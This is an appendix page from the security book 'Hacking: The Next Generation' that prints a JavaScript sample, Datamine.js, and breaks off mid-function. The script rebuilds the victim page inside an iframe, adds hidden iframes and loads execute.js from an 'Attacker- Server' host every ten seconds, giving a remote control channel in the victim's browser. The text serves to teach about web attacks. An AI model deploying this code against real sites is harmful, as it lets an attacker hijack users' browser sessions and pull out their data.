Appendix A. Chapter 2 Source Code Samples
The following sections contain source code samples from Chapter 2.
Datamine.js
function spotter(){ var bigframe=parent.document.documentElement.innerHTML; iframeHTML='<IFRAME NAME="Picture" iframe id="Picture-id001" width="100%" height="100%" scrolling="auto" frameborder="0"></IFRAME>'; iframeHTML+='<IFRAME NAME="Control" iframe id="Control-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>'; iframeHTML+='<IFRAME NAME="Data" iframe id="Data-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>'; iframeHTML+='<IFRAME NAME="CrossDomain" iframe id="CrossDomain-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>'; document.body.innerHTML=iframeHTML; setInterval('controlFrameFunction()',10000); var victimFrame = document.getElementById('Picture'); var newVictimContents = bigframe.replace("Datamine.js","noresponse.js"); var newVictimFrame = victimFrame.contentWindow.document; newVictimFrame.open(); newVictimFrame.write(newVictimContents); newVictimFrame.close(); document.all.Picture.style.visibility="visible"; } function controlFrameFunction() { var controlFrameHTML = "<html><body>"; controlFrameHTML += "</script>"; controlFrameHTML += "<script src='http://Attacker- Server/execute.js?trigger="+randomnumber+"'>"; controlFrameHTML += "</script>"; var controlFrame = document.getElementById('Control'); var controlContents = controlFrameHTML; var newControlContents = controlFrame.contentWindow.document; ...
Get Hacking: The Next Generation now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.